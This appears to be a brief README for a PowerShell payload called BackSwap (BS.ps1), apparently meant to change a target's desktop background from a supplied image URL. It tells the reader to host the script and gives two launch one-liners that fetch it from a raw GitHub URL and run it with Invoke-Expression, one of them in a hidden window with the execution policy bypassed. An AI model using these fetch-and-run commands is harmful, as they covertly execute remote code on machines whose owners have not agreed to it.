Made by VBV11
Go to BS.ps1 and change the "UR OWN IMAGE URL"
(Change the URL to ur own URL of the code)
- IEX(IWR
URL
)
EXAMPLE
IEX(IWR https://raw.githubusercontent.com/VBV11/BackSwap/main/BS.ps1)
(Change the URL to ur own URL of the code)
- powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
URL
?dl=1; invoke-expression $pl
EXAMPLE
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/VBV11/BackSwap/main/BS.ps1?dl=1; invoke-expression $pl